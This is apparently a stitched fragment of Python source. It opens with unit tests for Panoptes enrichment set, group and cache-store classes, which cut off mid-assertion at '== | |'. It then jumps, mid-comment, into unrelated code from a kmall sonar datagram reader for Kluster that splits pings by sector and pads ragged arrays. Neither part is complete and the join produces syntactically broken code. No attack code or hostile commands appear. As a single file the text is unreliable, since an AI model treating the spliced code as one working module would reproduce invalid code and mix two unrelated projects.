self.assertEquals(enrichment_set1.key, 'int_002')
self.assertDictEqual(enrichment_set1.value, {'status': 'down', 'index': 2, 'speed': 1000})
with self.assertRaises(AssertionError):
PanoptesEnrichmentSet('int_001', 'string')
with self.assertRaises(AssertionError):
PanoptesEnrichmentSet('int_001', 100)
def test_enrichment_schema_validator(self):
validator = PanoptesEnrichmentInterfaceSchemaValidator()
enrichment_set = PanoptesEnrichmentSet('int_001')
enrichment_set.add('speed', 1000)
enrichment_set.add('index', 001)
enrichment_set.add('status', 'up')
self.assertTrue(validator.validate(enrichment_set))
enrichment_set.add('status', 01)
self.assertFalse(validator.validate(enrichment_set))
@patch('time.time', mock_time)
def test_enrichment_group(self):
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
interface_data = \
'''{"data": [
{"int_001": {"index": 1, "speed": 1000, "status": "up"}},
{"int_002": {"index": 2, "speed": 1000, "status": "down"}}],
"metadata": {"_enrichment_group_creation_timestamp": %f, "_enrichment_ttl": 300, "_execute_frequency": 60},
"namespace": "interface"}''' % mock_time.return_value
neighbor_data = \
'''{"data": [{"host_name": {"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property", "vlan_id": 501}}],
"metadata": {"_enrichment_group_creation_timestamp": %f, "_enrichment_ttl": 600, "_execute_frequency": 120},
"namespace": "neighbor"}''' % mock_time.return_value
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup(1, interface_validation_object, 300, 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', 'non_validation_object', 300, 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, '300', 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 300, '60')
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 0, 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 0)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60).\
add_enrichment_set('not_PanoptesEnrichmentSet_obj')
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_group1.add_enrichment_set(enrichment_set2)
self.assertEqual(enrichment_group1.namespace, 'interface')
self.assertEqual(enrichment_group1.enrichment_ttl, 300)
self.assertEqual(enrichment_group1.execute_frequency, 60)
self.assertEqual(enrichment_group1.enrichment_group_creation_timestamp, mock_time.return_value)
self.assertEqual(ordered(json.loads(json.dumps(enrichment_group1.data, cls=PanoptesEnrichmentEncoder))),
ordered(json.loads(interface_data)['data']))
self.assertEqual(ordered(json.loads(enrichment_group1.json())), ordered(json.loads(interface_data)))
self.assertEquals(len(enrichment_group1), 2)
enrichment_set3 = PanoptesEnrichmentSet('int_002')
enrichment_set3.add('speed', 1000)
enrichment_set3.add('index', 002)
enrichment_set3.add('status', 'down')
self.assertEqual(ordered(json.loads(enrichment_group1.json())), ordered(json.loads(interface_data)))
self.assertEqual(ordered(enrichment_group1.metadata), ordered(json.loads(interface_data)['metadata']))
self.assertEquals(len(enrichment_group1), 2)
test_metadata = json.loads(interface_data)['metadata']
test_metadata['metadata_key'] = 'metadata_value'
enrichment_group1.upsert_metadata('metadata_key', 'metadata_value')
self.assertEqual(ordered(enrichment_group1.metadata), ordered(test_metadata))
enrichment_group1.upsert_metadata('ttl', 300)
with self.assertRaises(ValueError):
enrichment_group1.upsert_metadata('_enrichment_ttl', 300)
with self.assertRaises(AssertionError):
enrichment_group1.upsert_metadata('metadata', {})
with self.assertRaises(AssertionError):
enrichment_group1.upsert_metadata('metadata', [])
enrichment_set4 = PanoptesEnrichmentSet('host_name')
enrichment_set4.add('vlan_id', 501)
enrichment_set4.add('property', 'Test Property')
enrichment_set4.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set4)
self.assertEqual(ordered(json.loads(enrichment_group2.json())), ordered(json.loads(neighbor_data)))
self.assertEquals(len(enrichment_group2), 1)
enrichment_set5 = PanoptesEnrichmentSet('host_name01')
enrichment_set5.add('vlan_id', 502)
enrichment_set5.add('property', 'Netops01.US')
enrichment_set6 = PanoptesEnrichmentSet('host_name02')
enrichment_set6.add('vlan_id', 503)
enrichment_set6.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group3 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group3.add_enrichment_set(enrichment_set5)
with self.assertRaises(AssertionError):
enrichment_group3.add_enrichment_set(enrichment_set6)
interface_store_data = '{"int_001": {"index": 1, "speed": 1000, "status": "up"}, ' \
'"int_002": {"index": 2, "speed": 1000, "status": "down"}}'
neighbor_store_data = '{"host_name": {"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property", "vlan_id": 501}}'
self.assertEquals(ordered(json.loads(enrichment_group1.serialize_data())),
ordered(json.loads(interface_store_data)))
self.assertEquals(ordered(json.loads(enrichment_group2.serialize_data())),
ordered(json.loads(neighbor_store_data)))
enrichment_group1.upsert_metadata('ttl', 300)
with self.assertRaises(ValueError):
enrichment_group1.upsert_metadata('_enrichment_ttl', 300)
interface_data_serialized = '''{{"data": {{"int_001": {{"index": 1, "speed": 1000, "status": "up"}},
"int_002": {{"index": 2, "speed": 1000, "status": "down"}}}}, "metadata":
{{"_enrichment_group_creation_timestamp": {:.5f}, "_enrichment_ttl": 300, "_execute_frequency": 60,
"metadata_key": "metadata_value", "ttl": 300}}}}'''.format(mock_time.return_value)
neighbor_data_serialized = '''{{"data": {{"host_name": {{"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property"
,"vlan_id": 501}}}}, "metadata": {{"_enrichment_group_creation_timestamp": {:.5f},
"_enrichment_ttl": 600, "_execute_frequency": 120}}}}'''.format(mock_time.return_value)
self.assertEquals(ordered(json.loads(enrichment_group1.serialize())),
ordered(json.loads(interface_data_serialized)))
self.assertEquals(ordered(json.loads(enrichment_group2.serialize())),
ordered(json.loads(neighbor_data_serialized)))
@patch('time.time', mock_time)
def test_enrichment_group_set(self):
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
panoptes_resource = self.__panoptes_resource
enrichment_data = \
'''{{"enrichment": [{{"metadata": {{"_enrichment_group_creation_timestamp": {:.5f}, "_enrichment_ttl": 600,
"_execute_frequency": 120}}, "data": [{{"host_name":
{{"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property", "vlan_id": 501}}}}],
"namespace": "neighbor"}}, {{"metadata": {{"_enrichment_group_creation_timestamp": {:.5f},
"_enrichment_ttl": 300,
"_execute_frequency": 60}}, "data": [
{{"int_001": {{"index": 1, "speed": 1000, "status": "up"}}}}, {{"int_002": {{"index": 2, "speed": 1000,
"status": "down"}}}}], "namespace": "interface"}}],
"enrichment_group_set_creation_timestamp": {:.5f}, "resource": {{"resource_class": "test",
"resource_creation_timestamp": {:.5f}, "resource_endpoint": "test", "resource_id": "test",
"resource_metadata": {{"_resource_ttl": "604800", "test": "test"}}, "resource_plugin": "test",
"resource_site": "test",
"resource_subclass": "test", "resource_type": "test"}}}}'''.format(mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value)
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_group1.add_enrichment_set(enrichment_set2)
enrichment_set3 = PanoptesEnrichmentSet('host_name')
enrichment_set3.add('vlan_id', 501)
enrichment_set3.add('property', 'Test Property')
enrichment_set3.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set3)
enrichment_group_set1 = PanoptesEnrichmentGroupSet(panoptes_resource)
enrichment_group_set1.add_enrichment_group(enrichment_group1)
enrichment_group_set1.add_enrichment_group(enrichment_group2)
self.assertEquals(len(enrichment_group_set1), 2)
group_set_repr = "PanoptesEnrichmentGroupSet[resource:" \
"plugin|test|site|test|class|test|subclass|test|type|test|id|test|endpoint|test," \
"enrichment_group_set_creation_timestamp:{},PanoptesEnrichmentGroup[namespace:" \
"interface,enrichment_ttl:300,execute_frequency:60,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]],PanoptesEnrichmentSet" \
"[int_002[status:down,index:2,speed:1000]]],PanoptesEnrichmentGroup[namespace:neighbor," \
"enrichment_ttl:600,execute_frequency:120,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[host_name[mac:aa:bb:cc:dd:ee:ff,property:" \
"Test Property,vlan_id:501]]]]".format(mock_time.return_value,
mock_time.return_value,
mock_time.return_value)
self.assertEquals(repr(enrichment_group_set1), group_set_repr)
self.assertIsInstance(enrichment_group_set1.resource, PanoptesResource)
self.assertEqual(enrichment_group_set1.enrichment_group_set_creation_timestamp, mock_time.return_value)
self.assertEqual(
ordered(json.loads(json.dumps(enrichment_group_set1.enrichment, cls=PanoptesEnrichmentEncoder))),
ordered(json.loads(enrichment_data)['enrichment']))
self.assertEqual(ordered(json.loads(enrichment_group_set1.json())['enrichment']),
ordered(json.loads(enrichment_data)['enrichment']))
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroupSet('bad_resource')
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroupSet(panoptes_resource).add_enrichment_group('non_PanoptesEnrichmentGroup_obj')
enrichment_group_set2 = PanoptesEnrichmentGroupSet(panoptes_resource)
enrichment_group3 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
with self.assertRaises(AssertionError):
enrichment_group_set2.add_enrichment_group(enrichment_group3)
self.assertFalse(enrichment_group_set1 == enrichment_group1)
self.assertFalse(enrichment_group_set1 == enrichment_group_set2)
@patch('time.time', mock_time)
@patch('yahoo_panoptes.framework.resources.time', mock_time)
def test_multi_enrichment_group_set(self):
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
panoptes_resource = self.__panoptes_resource
multi_enrichment_results_data = \
{
"group_sets": [
{
"enrichment": [
{
"data": [
{
"host_name": {
"mac": "aa:bb:cc:dd:ee:ff",
"property": "Test Property",
"vlan_id": 501
}
},
{
"host_name01": {
"mac": "aa:bb:cc:dd:ee:ff",
"property": "Test Property",
"vlan_id": 502
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 600,
"_execute_frequency": 120
},
"namespace": "neighbor"
},
{
"data": [
{
"int_001": {
"index": 1,
"speed": 1000,
"status": "up"
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 300,
"_execute_frequency": 60
},
"namespace": "interface"
}
],
"enrichment_group_set_creation_timestamp": mock_time.return_value,
"resource": {
"resource_class": "test_class",
"resource_creation_timestamp": mock_time.return_value,
"resource_endpoint": "test_endpoint01",
"resource_id": "test_resource_id01",
"resource_metadata": {
"_resource_ttl": "604800"
},
"resource_plugin": "test_plugin",
"resource_site": "test_site",
"resource_subclass": "test_subclass",
"resource_type": "test_type"
}
},
{
"enrichment": [
{
"data": [
{
"int_001": {
"index": 1,
"speed": 1000,
"status": "up"
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 300,
"_execute_frequency": 60
},
"namespace": "interface"
},
{
"data": [
{
"host_name": {
"mac": "aa:bb:cc:dd:ee:ff",
"property": "Test Property",
"vlan_id": 501
}
}
],
"metadata": {
"_enrichment_group_creation_timestamp": mock_time.return_value,
"_enrichment_ttl": 600,
"_execute_frequency": 120
},
"namespace": "neighbor"
}
],
"enrichment_group_set_creation_timestamp": mock_time.return_value,
"resource": {
"resource_class": "test",
"resource_creation_timestamp": mock_time.return_value,
"resource_endpoint": "test",
"resource_id": "test",
"resource_metadata": {
"_resource_ttl": "604800",
"test": "test"
},
"resource_plugin": "test",
"resource_site": "test",
"resource_subclass": "test",
"resource_type": "test"
}
}
]
}
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_set3 = PanoptesEnrichmentSet('host_name')
enrichment_set3.add('vlan_id', 501)
enrichment_set3.add('property', 'Test Property')
enrichment_set3.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set3)
enrichment_group_set1 = PanoptesEnrichmentGroupSet(panoptes_resource)
enrichment_group_set1.add_enrichment_group(enrichment_group1)
enrichment_group_set1.add_enrichment_group(enrichment_group2)
panoptes_resource01 = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id01',
resource_endpoint='test_endpoint01',
resource_plugin='test_plugin')
panoptes_resource02 = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id02',
resource_endpoint='test_endpoint02',
resource_plugin='test_plugin')
enrichment_set4 = PanoptesEnrichmentSet('host_name01')
enrichment_set4.add('vlan_id', 502)
enrichment_set4.add('property', 'Test Property')
enrichment_set4.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group3 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group3.add_enrichment_set(enrichment_set3)
enrichment_group3.add_enrichment_set(enrichment_set4)
enrichment_group_set2 = PanoptesEnrichmentGroupSet(panoptes_resource01)
enrichment_group_set2.add_enrichment_group(enrichment_group1)
enrichment_group_set2.add_enrichment_group(enrichment_group3)
multi_enrichment_group_set = PanoptesEnrichmentMultiGroupSet()
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set1)
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set2)
multi_enrichment_group_set_repr = "PanoptesEnrichmentMultiGroupSet[PanoptesEnrichmentGroupSet[resource:" \
"plugin|test_plugin|site|test_site|class|test_class|subclass|test_subclass" \
"|type|test_type|id|test_resource_id01|endpoint|test_endpoint01," \
"enrichment_group_set_creation_timestamp:{}," \
"PanoptesEnrichmentGroup[namespace:interface,enrichment_ttl:300," \
"execute_frequency:60,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]]]," \
"PanoptesEnrichmentGroup[namespace:neighbor,enrichment_ttl:600," \
"execute_frequency:120,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[host_name[mac:aa:bb:cc:dd:ee:ff,property:" \
"Test Property,vlan_id:501]],PanoptesEnrichmentSet[host_name01" \
"[mac:aa:bb:cc:dd:ee:ff,property:Test Property,vlan_id:502]]]]," \
"PanoptesEnrichmentGroupSet[resource:plugin|test|site|test|class|test|" \
"subclass|test|type|test|id|test|endpoint|test," \
"enrichment_group_set_creation_timestamp:{}," \
"PanoptesEnrichmentGroup[namespace:interface,enrichment_ttl:300," \
"execute_frequency:60,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]]]," \
"PanoptesEnrichmentGroup[namespace:neighbor,enrichment_ttl:600," \
"execute_frequency:120,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[host_name[mac:aa:bb:cc:dd:ee:ff,property:" \
"Test Property,vlan_id:501]]]]]".format(mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value)
self.assertEquals(repr(multi_enrichment_group_set), multi_enrichment_group_set_repr)
self.assertEquals(len(multi_enrichment_group_set.enrichment_group_sets), 2)
self.assertEquals(ordered(json.loads(multi_enrichment_group_set.json())),
ordered(multi_enrichment_results_data))
self.assertEquals(len(multi_enrichment_group_set), 2)
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set2)
self.assertEquals(len(multi_enrichment_group_set), 2)
enrichment_group_set3 = PanoptesEnrichmentGroupSet(panoptes_resource02)
enrichment_group_set3.add_enrichment_group(enrichment_group1)
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set3)
self.assertEquals(len(multi_enrichment_group_set), 3)
with self.assertRaises(AssertionError):
multi_enrichment_group_set.add_enrichment_group_set('non_enrichment_group')
enrichment_group_set3 = PanoptesEnrichmentGroupSet(panoptes_resource01)
with self.assertRaises(AssertionError):
multi_enrichment_group_set.add_enrichment_group_set(enrichment_group_set3)
class TestPanoptesEnrichmentCacheStore(unittest.TestCase):
@patch('redis.StrictRedis', PanoptesMockRedis)
@patch('time.time', mock_time)
def setUp(self):
self.my_dir, self.panoptes_test_conf_file = _get_test_conf_file()
self._panoptes_context = PanoptesContext(self.panoptes_test_conf_file,
key_value_store_class_list=[PanoptesEnrichmentCacheKeyValueStore,
PanoptesResourcesKeyValueStore])
self._enrichment_kv = self._panoptes_context.get_kv_store(PanoptesEnrichmentCacheKeyValueStore)
self._panoptes_resource = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id',
resource_endpoint='test_endpoint',
resource_plugin='test_plugin')
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_group1.add_enrichment_set(enrichment_set2)
enrichment_set3 = PanoptesEnrichmentSet('host_name')
enrichment_set3.add('vlan_id', 501)
enrichment_set3.add('property', 'Test Property')
enrichment_set3.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set3)
self.enrichment_group_set1 = PanoptesEnrichmentGroupSet(self._panoptes_resource)
self.enrichment_group_set1.add_enrichment_group(enrichment_group1)
self.enrichment_group_set1.add_enrichment_group(enrichment_group2)
self._panoptes_resource01 = PanoptesResource(resource_site='test_site',
resource_class='test_class',
resource_subclass='test_subclass',
resource_type='test_type',
resource_id='test_resource_id01',
resource_endpoint='test_endpoint01',
resource_plugin='test_plugin')
enrichment_set4 = PanoptesEnrichmentSet('host_name01')
enrichment_set4.add('vlan_id', 502)
enrichment_set4.add('property', 'Test Property')
enrichment_set4.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group3 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group3.add_enrichment_set(enrichment_set3)
enrichment_group3.add_enrichment_set(enrichment_set4)
self.enrichment_group_set2 = PanoptesEnrichmentGroupSet(self._panoptes_resource01)
self.enrichment_group_set2.add_enrichment_group(enrichment_group1)
self.enrichment_group_set2.add_enrichment_group(enrichment_group3)
self._multi_enrichment_group_set = PanoptesEnrichmentMultiGroupSet()
self._multi_enrichment_group_set.add_enrichment_group_set(self.enrichment_group_set1)
self._multi_enrichment_group_set.add_enrichment_group_set(self.enrichment_group_set2)
@patch('time.time', mock_time)
def test_panoptes_enrichment_set(self):
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
self.assertEquals(enrichment_set1.json(),
'{"int_001": {"index": 1, "speed": 1000, "status": "up"}}')
self.assertEquals(repr(enrichment_set1),
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]]")
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
self.assertFalse(enrichment_set1 == | |
the next chunk
srchdat = self.FID.read(min(20, (start_ptr + file_length) - cur_ptr))
stx_idx = srchdat.find(b'#')
if stx_idx >= 0:
possible_start = cur_ptr + stx_idx
self.FID.seek(possible_start)
datchk = self.FID.read(4)
m = self.datagram_ident_search.search(datchk, 0)
if m:
self.FID.seek(possible_start - 4)
return True
def _divide_rec(self, rec):
"""
MRZ comes in from sequential read by time/ping. Each ping may have multiple sectors to it which we want
to treat as separate pings. Do this by generating a new record for each sector in the ping. When rec is MRZ,
the return is a list of rec split by sector. Otherwise returns the original rec as the only element in a list
returns: totalrecs, list of split rec
"""
if self.datagram_ident != 'MRZ':
return [rec]
elif rec['pingInfo']['numTxSectors'] == 1:
return [rec]
else:
totalrecs = []
pingtime = rec['header']['dgtime']
for sec in rec['txSectorInfo']['txSectorNumb']:
split_rec = copy.copy(rec)
split_rec['txSectorInfo'] = {k: v[sec] for (k,v) in rec['txSectorInfo'].items()}
rx_index = np.where(np.array(rec['sounding']['txSectorNumb']) == sec)
split_rec['sounding'] = {k: np.array(v)[rx_index] for (k,v) in rec['sounding'].items()}
# ping time equals datagram time plus sector transmit delay
split_rec['header']['dgtime'] = pingtime + split_rec['txSectorInfo']['sectorTransmitDelay_sec']
totalrecs.append(split_rec)
return totalrecs
def _pad_to_dense(self, arr, padval=999.0, maxlen=500, override_type=None, detectioninfo=False):
"""
Appends the minimal required amount of zeroes at the end of each array in the jagged array `M`, such that `M`
loses its jaggedness.
A required operation for our sector-wise read. Each sector has a varying amount of beams over time, so the
resulting number of values per ping (beam pointing angle for example) will differ between pings. Here we make
these ragged arrays square, by using the padval to fill in the holes.
A padval of 999 is arbitrary, but we use that nodatavalue in kluster to reform pings and do processing, so
leave at 999 for Kluster. maxlen is the max number of expected beams per sector.
returns: Z, square array padded with padval where arr is ragged
"""
# override the dynamic length of beams across records by applying static length limit.
# ideally this should cover all cases
if override_type is not None:
typ = override_type
else:
typ = arr[0].dtype
Z = np.full((len(arr), maxlen), padval, dtype=typ)
for enu, row in enumerate(arr):
# some records being read have NaNs in them unexpectedly, like part of the record isn't being read
row[np.isnan(row)] = 0
if detectioninfo:
Z[enu, :len(row)] = self.translate_detectioninfo(row)
else:
Z[enu, :len(row)] = row
return Z
def _build_sequential_read_categories(self):
"""
sequential_read_records will go through the file and build a dictionary of the desired records. Specify those
records that you want here, in recs_categories. I use a dot notation to access the correct attribute, see
below.
"""
recs_categories = {'SKM': ['sample.KMdefault.dgtime', 'sample.KMdefault.roll_deg', 'sample.KMdefault.pitch_deg',
'sample.KMdefault.heave_m', 'sample.KMdefault.heading_deg',
'sample.KMdefault.latitude_deg', 'sample.KMdefault.longitude_deg',
'sample.KMdefault.ellipsoidHeight_m'],
'IIP': ['header.dgtime', 'install_txt'],
'MRZ': ['header.dgtime', 'cmnPart.pingCnt', 'cmnPart.rxTransducerInd',
'pingInfo.soundSpeedAtTxDepth_mPerSec', 'pingInfo.numTxSectors', 'header.systemID',
'txSectorInfo.txSectorNumb', 'txSectorInfo.tiltAngleReTx_deg',
'txSectorInfo.sectorTransmitDelay_sec', 'txSectorInfo.centreFreq_Hz',
'sounding.beamAngleReRx_deg', 'sounding.txSectorNumb', 'sounding.detectionType',
'sounding.qualityFactor', 'sounding.twoWayTravelTime_sec',
'pingInfo.modeAndStabilisation', 'pingInfo.pulseForm', 'pingInfo.depthMode'],
'IOP': ['header.dgtime', 'runtime_txt'],
'SVP': ['time_sec', 'sensorData.depth_m', 'sensorData.soundVelocity_mPerSec']}
recs_categories_translator = {'SKM': {'sample.KMdefault.dgtime': [['attitude', 'time'], ['navigation', 'time']],
'sample.KMdefault.roll_deg': [['attitude', 'roll']],
'sample.KMdefault.pitch_deg': [['attitude', 'pitch']],
'sample.KMdefault.heave_m': [['attitude', 'heave']],
'sample.KMdefault.heading_deg': [['attitude', 'heading']],
'sample.KMdefault.latitude_deg': [['navigation', 'latitude']],
'sample.KMdefault.longitude_deg': [['navigation', 'longitude']],
'sample.KMdefault.ellipsoidHeight_m': [['navigation', 'altitude']]},
'MRZ': {'header.dgtime': [['ping', 'time']],
'cmnPart.pingCnt': [['ping', 'counter']],
'cmnPart.rxTransducerInd': [['ping', 'rxid']],
'pingInfo.soundSpeedAtTxDepth_mPerSec': [['ping', 'soundspeed']],
'pingInfo.numTxSectors': [['ping', 'ntx']],
'header.systemID': [['ping', 'serial_num']],
'txSectorInfo.txSectorNumb': [['ping', 'txsectorid']],
'txSectorInfo.tiltAngleReTx_deg': [['ping', 'tiltangle']],
'txSectorInfo.sectorTransmitDelay_sec': [['ping', 'delay']],
'txSectorInfo.centreFreq_Hz': [['ping', 'frequency']],
'sounding.beamAngleReRx_deg': [['ping', 'beampointingangle']],
'sounding.txSectorNumb': [['ping', 'txsector_beam']],
'sounding.detectionType': [['ping', 'detectioninfo']],
'sounding.qualityFactor': [['ping', 'qualityfactor_percent']],
'sounding.twoWayTravelTime_sec': [['ping', 'traveltime']],
'pingInfo.modeAndStabilisation': [['ping', 'yawpitchstab']],
'pingInfo.pulseForm': [['ping', 'mode']],
'pingInfo.depthMode': [['ping', 'modetwo']]},
'IIP': {'header.dgtime': [['installation_params', 'time']],
'install_txt': [['installation_params', 'installation_settings']]},
'IOP': {'header.dgtime': [['runtime_params', 'time']],
'runtime_txt': [['runtime_params', 'runtime_settings']]},
'SVP': {'time_sec': [['profile', 'time']],
'sensorData.depth_m': [['profile', 'depth']],
'sensorData.soundVelocity_mPerSec': [['profile', 'soundspeed']]}}
recs_categories_result = {
'attitude': {'time': None, 'roll': None, 'pitch': None, 'heave': None, 'heading': None},
'installation_params': {'time': None, 'serial_one': None, 'serial_two': None,
'installation_settings': None},
'ping': {'time': None, 'counter': None, 'rxid': None, 'soundspeed': None, 'ntx': None,
'serial_num': None, 'txsectorid': None, 'tiltangle': None, 'delay': None,
'frequency': None, 'beampointingangle': None, 'txsector_beam': None,
'detectioninfo': None, 'qualityfactor_percent': None, 'traveltime': None, 'mode': None,
'modetwo': None, 'yawpitchstab': None},
'runtime_params': {'time': None, 'runtime_settings': None},
'profile': {'time': None, 'depth': None, 'soundspeed': None},
'navigation': {'time': None, 'latitude': None, 'longitude': None, 'altitude': None}}
return recs_categories, recs_categories_translator, recs_categories_result
def _finalize_records(self, recs_to_read, recs_count):
"""
Take output from sequential_read_records and alter the type/size/translate as needed for Kluster to read and
convert to xarray. Major steps include
- adding empty arrays so that concatenation later on will work
- pad_to_dense to convert the ragged sector-wise arrays into square numpy arrays
- translate the runtime parameters from integer/binary codes to string identifiers for easy reading (and to
allow comparing results between different file types)
returns: recs_to_read, dict of dicts finalized
"""
# drop the delay array and txsector_beam array since we've already used it for adjusting ping time and building
# sector masks
recs_to_read['ping'].pop('delay')
recs_to_read['ping'].pop('txsector_beam')
# need to force in the serial number, its not in the header anymore with these kmall files...
if recs_to_read['installation_params']['installation_settings'] is not None:
inst_params = recs_to_read['installation_params']['installation_settings'][0]
if inst_params is not None:
recs_to_read['installation_params']['serial_one'] = np.array([int(inst_params['pu_serial_number'])])
# currently nothing in the record for identifying the second system in a dual head
recs_to_read['installation_params']['serial_two'] = np.array([0])
for rec in recs_to_read:
for dgram in recs_to_read[rec]:
if recs_count[rec] == 0:
if rec != 'runtime_params' or dgram == 'time':
# found no records, empty array
recs_to_read[rec][dgram] = np.zeros(0)
else:
# found no records, empty array of strings for the mode/stab records
recs_to_read[rec][dgram] = np.zeros(0, 'U2')
elif rec == 'ping':
if dgram in ['beampointingangle', 'traveltime', 'qualityfactor_percent']:
# these datagrams can vary in number of beams, have to pad with 999 for 'jaggedness'
recs_to_read[rec][dgram] = self._pad_to_dense(recs_to_read[rec][dgram])
elif dgram in ['detectioninfo', 'qualityfactor']:
# same for detection info, but it also needs to be converted to something other than int8
recs_to_read[rec][dgram] = self._pad_to_dense(recs_to_read[rec][dgram], override_type=np.int)
elif dgram == 'yawandpitchstabilization':
recs_to_read[rec][dgram] = self.translate_yawpitch_tostring(np.array(recs_to_read[rec][dgram]))
elif dgram == 'mode':
recs_to_read[rec][dgram] = self.translate_mode_tostring(np.array(recs_to_read[rec][dgram]))
elif dgram == 'modetwo':
recs_to_read[rec][dgram] = self.translate_mode_two_tostring(np.array(recs_to_read[rec][dgram]))
else:
recs_to_read[rec][dgram] = np.array(recs_to_read[rec][dgram])
elif rec in ['navigation', 'attitude']: # these recs have time blocks of data in them, need to be concatenated
